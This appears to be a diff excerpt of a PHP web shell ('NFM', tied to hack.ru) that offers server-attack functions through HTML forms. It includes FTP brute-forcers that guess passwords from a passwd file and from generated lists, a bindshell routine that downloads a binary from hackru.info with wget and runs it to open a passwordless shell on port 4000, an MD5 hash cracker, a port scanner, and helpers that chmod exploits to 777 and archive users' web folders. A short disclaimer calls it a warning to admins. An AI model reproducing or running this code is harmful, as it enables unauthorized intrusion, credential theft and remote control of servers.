+<b>Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay more attention to configuration of your system.</b><br><br>
+
+<b>How can you find us:</b><br>
+
+Irc server: irc.megik.net:6667 /join #hack.ru<br>
+
+See you round at network!!!<br></td></tr></table><br>";
+
+}
+
+
+
+
+
+function exploits($dir) {
+
+ global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp;
+
+if (!isset($status)) upload_exploits();
+
+
+
+else
+
+{
+
+
+
+$data = implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+fputs($fp, $data);
+
+$ok = fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+print "".exec("chmod 777 $public[1]")."";
+
+print "".exec("chmod 777 $public[2]")."";
+
+print "".exec("chmod 777 $public[3]")."";
+
+print "".exec("chmod 777 $private[1]")."";
+
+print "".exec("chmod 777 $private[2]")."";
+
+print "".exec("chmod 777 $private[3]")."";
+
+print "".exec("chmod 777 $private[4]")."";
+
+print "".exec("chmod 777 $private[5]")."";
+
+print "".exec("chmod 777 $private[6]")."";
+
+print "".exec("chmod 777 $private[7]")."";
+
+print "".exec("chmod 777 $private[8]")."";
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "Some errors occured.";
+
+}
+
+}
+
+}
+
+
+
+
+
+# FTP-bruteforce
+
+function ftp() {
+
+ global $action, $ftp_server, $filename, $HTTP_HOST;
+
+ ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP server: <b>$ftp_server</b></td></tr>";
+
+
+
+ $fpip = @fopen ($filename, "r");
+
+ if ($fpip) {
+
+  while (!feof ($fpip)) {
+
+   $buf = fgets($fpip, 100);
+
+   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+   $conn_id=ftp_connect($ftp_server);
+
+   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {
+
+
+
+   $f=@fopen($HTTP_HOST,"a+");
+
+   fputs($f,"$g[1]:$g[1]\n");
+
+     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>";
+
+
+
+   ftp_close($conn_id);
+
+   fclose($f);
+
+   } else {
+
+    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>";
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+function tar() {
+
+ global $action, $filename;
+
+ set_time_limit(0);
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data compression</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>According to the different settings of servers, I didn't make default config of NFM. You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.<br><br>
+
+<b>Warning!</b><br>File <b>passwd</b> can have big size, so opening all users of this host can waste much time.<br><br>
+
+<b>It's highly recommended!</b><br>Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.</blockquote></td></tr>
+
+</table><br>";
+
+
+
+$http_public="/public_html/";
+
+$fpip = @fopen ($filename, "r");
+
+if ($fpip) {
+
+ while (!feof ($fpip)) {
+
+  $buf = fgets($fpip, 100);
+
+  ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+  $name=$g[1];
+
+  echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<form method='get' action='$PHP_SELF' >
+
+<tr><td align=center colspan=2 class=pagetitle><b>Compression <u>$name.tar.gz</u>:</b></td></tr>
+
+<tr>
+
+<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+
+<td valign=top><input type=submit value='GO' class=button1 $style_button></td>
+
+</tr></form></table>";
+
+  }
+
+ }
+
+}
+
+
+
+# bindshell
+
+function bash() {
+
+ global $action, $port_bind, $pass_key;
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Binding shell</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>Current shell binds 4000 port, you may access to it by telneting to host:4000 port without password.</td></tr>
+
+</table><br>";
+
+
+
+echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b> Bindshell binary is situated in file called<u><i>s</i></u></b></td></tr>";
+
+
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://hackru.info/adm/exploits/bash/s")."</b> Downloading...</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> now chmod to 777</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> now running to 4000 port</td></tr>";
+
+# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm -f s")."</b> Removing file<u>s</u> now...</td></tr>";
+
+echo"</table>";
+
+
+
+ }
+
+
+
+function crypte() {
+
+ global $action,$md5a,$sha1a,$crc32, $key,$string;
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data crypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change your pass to NFM here.</blockquote></td></tr>
+
+</table>";
+
+
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Here are some useful cryption methods, which uses MHASH lib:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>MD5 </b>(Very popular and fast method)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td>
+
+ <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>SHA1 </b>(SHA1 - method to crypt with open key, It's very usefull too)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'>
+
+ </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>CRC32 </b>(Most used when making CRC check of data, but you can find a host with forum, with passwords, crypted by CRC32)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+
+
+ }
+
+
+
+function decrypte() {
+
+ global $action,$pass_de,$chars_de,$dat,$date;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data decrypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... So this is bruteforce.</blockquote></td></tr>
+
+</table>";
+
+
+
+if($chars_de==""){$chars_de="";}
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Data decrypter:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>Decrypt MD5</b>(decryption time depends on the length or crypted word, may take a long time)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400 >&nbsp;MD5 hash:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=Clear class=button1 $style_button></td>
+
+  <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+
+  <td class=pagetitle width=120 valign=top><b>Symvols for bruteforce:</b><br><font color=red><b><u>ENG:</u></b></font>
+
+   <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a>
+
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:?.,&quot;')>[Symvols]</a><br><br>
+
+<font color=red><b><u>RUS:</u></b></font>
+
+<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a>
+
+<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a>
+
+</td></tr>
+
+<tr><td align=center width=400>
+
+<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+if($_POST[pass_de]){
+
+$pass_de=htmlspecialchars($pass_de);
+
+$pass_de=stripslashes($pass_de);
+
+$dat=date("H:i:s");
+
+$date=date("d:m:Y");
+
+
+
+crack_md5();
+
+}
+
+}
+
+
+
+function crack_md5() {
+
+global $chars_de;
+
+$chars=$_POST[chars];
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+$chars_de=str_replace("<",chr(60),$chars_de);
+
+$chars_de=str_replace(">",chr(62),$chars_de);
+
+$c=strlen($chars_de);
+
+for ($next = 0; $next <= 31; $next++) {
+
+for ($i1 = 0; $i1 <= $c; $i1++) {
+
+$word[1] = $chars_de{$i1};
+
+for ($i2 = 0; $i2 <= $c; $i2++) {
+
+$word[2] = $chars_de{$i2};
+
+if ($next <= 2) {
+
+result(implode($word));
+
+}else {
+
+for ($i3 = 0; $i3 <= $c; $i3++) {
+
+$word[3] = $chars_de{$i3};
+
+if ($next <= 3) {
+
+result(implode($word));
+
+}else {
+
+for ($i4 = 0; $i4 <= $c; $i4++) {
+
+$word[4] = $chars_de{$i4};
+
+if ($next <= 4) {
+
+result(implode($word));
+
+}else {
+
+for ($i5 = 0; $i5 <= $c; $i5++) {
+
+$word[5] = $chars_de{$i5};
+
+if ($next <= 5) {
+
+result(implode($word));
+
+}else {
+
+for ($i6 = 0; $i6 <= $c; $i6++) {
+
+$word[6] = $chars_de{$i6};
+
+if ($next <= 6) {
+
+result(implode($word));
+
+}else {
+
+for ($i7 = 0; $i7 <= $c; $i7++) {
+
+$word[7] = $chars_de{$i7};
+
+if ($next <= 7) {
+
+result(implode($word));
+
+}else {
+
+for ($i8 = 0; $i8 <= $c; $i8++) {
+
+$word[8] = $chars_de{$i8};
+
+if ($next <= 8) {
+
+result(implode($word));
+
+}else {
+
+for ($i9 = 0; $i9 <= $c; $i9++) {
+
+$word[9] = $chars_de{$i9};
+
+if ($next <= 9) {
+
+result(implode($word));
+
+}else {
+
+for ($i10 = 0; $i10 <= $c; $i10++) {
+
+$word[10] = $chars_de{$i10};
+
+if ($next <= 10) {
+
+result(implode($word));
+
+}else {
+
+for ($i11 = 0; $i11 <= $c; $i11++) {
+
+$word[11] = $chars_de{$i11};
+
+if ($next <= 11) {
+
+result(implode($word));
+
+}else {
+
+for ($i12 = 0; $i12 <= $c; $i12++) {
+
+$word[12] = $chars_de{$i12};
+
+if ($next <= 12) {
+
+result(implode($word));
+
+}else {
+
+for ($i13 = 0; $i13 <= $c; $i13++) {
+
+$word[13] = $chars_de{$i13};
+
+if ($next <= 13) {
+
+result(implode($word));
+
+}else {
+
+for ($i14 = 0; $i14 <= $c; $i14++) {
+
+$word[14] = $chars_de{$i14};
+
+if ($next <= 14) {
+
+result(implode($word));
+
+}else {
+
+for ($i15 = 0; $i15 <= $c; $i15++) {
+
+$word[15] = $chars_de{$i15};
+
+if ($next <= 15) {
+
+result(implode($word));
+
+}else {
+
+for ($i16 = 0; $i16 <= $c; $i16++) {
+
+$word[16] = $chars_de{$i16};
+
+if ($next <= 16) {
+
+result(implode($word));
+
+}else {
+
+for ($i17 = 0; $i17 <= $c; $i17++) {
+
+$word[17] = $chars_de{$i17};
+
+if ($next <= 17) {
+
+result(implode($word));
+
+}else {
+
+for ($i18 = 0; $i18 <= $c; $i18++) {
+
+$word[18] = $chars_de{$i18};
+
+if ($next <= 18) {
+
+result(implode($word));
+
+}else {
+
+for ($i19 = 0; $i19 <= $c; $i19++) {
+
+$word[19] = $chars_de{$i19};
+
+if ($next <= 19) {
+
+result(implode($word));
+
+}else {
+
+for ($i20 = 0; $i20 <= $c; $i20++) {
+
+$word[20] = $chars_de{$i20};
+
+if ($next <= 20) {
+
+result(implode($word));
+
+}else {
+
+for ($i21 = 0; $i21 <= $c; $i21++) {
+
+$word[21] = $chars_de{$i21};
+
+if ($next <= 21) {
+
+result(implode($word));
+
+}else {
+
+for ($i22 = 0; $i22 <= $c; $i22++) {
+
+$word[22] = $chars_de{$i22};
+
+if ($next <= 22) {
+
+result(implode($word));
+
+}else {
+
+for ($i23 = 0; $i23 <= $c; $i23++) {
+
+$word[23] = $chars_de{$i23};
+
+if ($next <= 23) {
+
+result(implode($word));
+
+}else {
+
+for ($i24 = 0; $i24 <= $c; $i24++) {
+
+$word[24] = $chars_de{$i24};
+
+if ($next <= 24) {
+
+result(implode($word));
+
+}else {
+
+for ($i25 = 0; $i25 <= $c; $i25++) {
+
+$word[25] = $chars_de{$i25};
+
+if ($next <= 25) {
+
+result(implode($word));
+
+}else {
+
+for ($i26 = 0; $i26 <= $c; $i26++) {
+
+$word[26] = $chars_de{$i26};
+
+if ($next <= 26) {
+
+result(implode($word));
+
+}else {
+
+for ($i27 = 0; $i27 <= $c; $i27++) {
+
+$word[27] = $chars_de{$i27};
+
+if ($next <= 27) {
+
+result(implode($word));
+
+}else {
+
+for ($i28 = 0; $i28 <= $c; $i28++) {
+
+$word[28] = $chars_de{$i28};
+
+if ($next <= 28) {
+
+result(implode($word));
+
+}else {
+
+for ($i29 = 0; $i29 <= $c; $i29++) {
+
+$word[29] = $chars_de{$i29};
+
+if ($next <= 29) {
+
+result(implode($word));
+
+}else {
+
+for ($i30 = 0; $i30 <= $c; $i30++) {
+
+$word[30] = $chars_de{$i30};
+
+if ($next <= 30) {
+
+result(implode($word));
+
+}else {
+
+for ($i31 = 0; $i31 <= $c; $i31++) {
+
+$word[31] = $chars_de{$i31};
+
+if ($next <= 31) {
+
+result(implode($word));
+
+
+
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+
+
+function result($word) {
+
+global $dat,$date;
+
+$pass_de=$_POST[pass_de];
+
+$dat2=date("H:i:s");
+
+$date2=date("d:m:Y");
+
+
+
+if(md5($word)==$pass_de){
+
+print "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Brutefrcing result:</td></tr>
+
+  <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>crypted Hash:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce start:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce finish:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;result was wrote to file:  <b>".$word."_md5</b></td></tr>
+
+</table>
+
+                            ";
+
+							$f=@fopen($word._md5,"a+");
+
+                            fputs($f,"Decrypted MD5 hash [$pass_de] = $word\nBruteforce start:\t$dat - $date\Bruteforce finish:\t$dat2 - $date2\n ");
+
+                             exit;}
+
+
+
+
+
+
+
+}
+
+
+
+function brut_ftp() {
+
+ global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>FTP bruteforce</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload . </blockquote></td></tr>
+
+</table>";
+
+
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Brut FTP:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>FTP bruteforce</b>(full bruteforce, you are only to enter a value of number of passwords and brute will begin from password-list file, which script generates itself on the fly!)</td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Number of passwords:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='chislo' size=10></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Password to test:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='proverka' size=50></td></tr>
+
+<tr><td width=500 align=center colspan=2><input type='submit' value='FTP brute start' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+function s() {
+
+   $word="qwrtypsdfghjklzxcvbnm";
+
+   return $word[mt_rand(0,strlen($word)-1)];
+
+}
+
+
+
+function g() {
+
+   $word="euioam";
+
+   return $word[mt_rand(0,strlen($word)-2)];
+
+}
+
+
+
+function name0() {   return s().g().s();                        }
+
+function name1() {   return s().g().s().g();                    }
+
+function name2() {   return s().g().g().s();                    }
+
+function name3() {   return s().s().g().s().g();                }
+
+function name4() {   return g().s().g().s().g();                }
+
+function name5() {   return g().g().s().g().s();                }
+
+function name6() {   return g().s().s().g().s();                }
+
+function name7() {   return s().g().g().s().g();                }
+
+function name8() {   return s().g().s().g().g();                }
+
+function name9() {   return s().g().s().g().s().g();            }
+
+function name10() {   return s().g().s().s().g().s().s();        }
+
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+
+
+function randword() {
+
+   global $cool;
+
+   $func="name".mt_rand(0,11);
+
+   $func2="name".mt_rand(0,11);
+
+   switch (mt_rand(0,11)) {
+
+      case 0: return $func().mt_rand(5,99);
+
+      case 1: return $func()."-".$func2();
+
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+
+      case 3: return $func()."!".$func();
+
+      case 4: return randpass(mt_rand(5,12));
+
+      default: return $func();
+
+   }
+
+
+
+
+
+}
+
+
+
+function randpass($len) {
+
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+
+   $s="";
+
+   for ($i=0; $i<$len; $i++) {
+
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+
+   }
+
+   return $s;
+
+}
+
+if (@unlink("pass.txt") < 0){
+
+echo "nothing";
+
+exit;
+
+}
+
+$file="pass.txt";
+
+if($file && $host && $login){
+
+   $cn=mt_rand(30,30);
+
+for ($i=0; $i<$cn; $i++) {
+
+   $s=$cool2[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$s\n");
+
+   }
+
+
+
+  $cnt2=mt_rand(43,43);
+
+for ($i=0; $i<$cnt2; $i++) {
+
+   $r=$cool[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$login$r\n");
+
+}
+
+$p="$proverka";
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$p\n");
+
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+
+   for ($i=0; $i<$cnt3; $i++) {
+
+   $u=randword();
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$u\n");
+
+  }
+
+
+
+  if(is_file($file)){
+
+ $passwd=file($file,1000);
+
+  for($i=0; $i<count($passwd); $i++){
+
+   $stop=false;
+
+   $password=trim($passwd[$i]);
+
+   $open_ftp=@fsockopen($host,21);
+
+    if($open_ftp!=false){
+
+     fputs($open_ftp,"user $login\n");
+
+     fputs($open_ftp,"pass $password\n");
+
+     while(!feof($open_ftp) && $stop!=true){
+
+      $text=fgets($open_ftp,4096);
+
+      if(preg_match("/230/",$text)){
+
+       $stop=true;
+
+	   $f=@fopen($host._ftp,"a+");
+
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+
+
+       echo "
+
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Congratulations! Password is known now.</font></b><br>
+
+&nbsp;&nbsp;Connected to: <b>$host</b><br>&nbsp;&nbsp;with login: <b>$login</b><br>&nbsp;&nbsp;with password: <b>$password</b></td></tr></table>
+
+";exit;
+
+      }
+
+      elseif(preg_match("/530/",$text)){
+
+       $stop=true;
+
+
+
+      }
+
+     }
+
+     fclose($open_ftp);
+
+   }else{
+
+    echo "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>FTP is incorrect!!! At <b><u>$host</u></b> 21 port is closed! check your settings</b></b></td></tr>
+
+</table>
+
+";exit;
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+}
+
+
+
+# port scanner
+
+function portscan() {
+
+ global $action,$portscan,$port,$HTTP_HOST,$min,$max;
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time1 = $mtime;
+
+
+
+ $id = $HTTP_HOST;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Scan results:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >Scanning host to find any reachable and open ports" . "...<br></td></tr></table>";
+
+
+
+ $lport = $min;
+
+ $hport = $max;
+
+ $op = 0;
+
+ $gp = 0;
+
+
+
+ for ($porta=$lport; $porta<=$hport; $porta++) {
+
+  $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4);
+
+  if ( !$fp ) { $gp++; }
+
+  else {
+
+   $port_addres = $port[$porta];
+
+   if($port_addres == "") $port_addres = "unknown";
+
+   $serv = getservbyport($porta, TCP);
+
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>What's the service is?</a>)</td></tr>";
+
+   $op++;
+
+  }
+
+ }
+
+
+
+ if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Current host seems don't have any open port...hmm, but you're connected to it to 80...check out firewall</b></td></tr></table>";
+
+
+
+ $unsi = ($op/$porta)*100;
+
+ $unsi = round($unsi);
+
+
+
+ echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Scan statistics:</b></b></td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Scanned ports:</b>&nbsp;&nbsp;$porta</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Open ports:</b>&nbsp;&nbsp;$op</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Closed ports:</b>&nbsp;&nbsp;$gp</td></tr>";
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time2 = $mtime;
+
+ $loadtime = ($time2 - $time1);
+
+ $loadtime = round($loadtime, 2);
+
+
+
+ echo "<tr colspan=2><td align=center width=100% colspan=3><b>Scan time:</b>&nbsp;&nbsp;$loadtime seconds</tr></table>";
+
+}
+
+
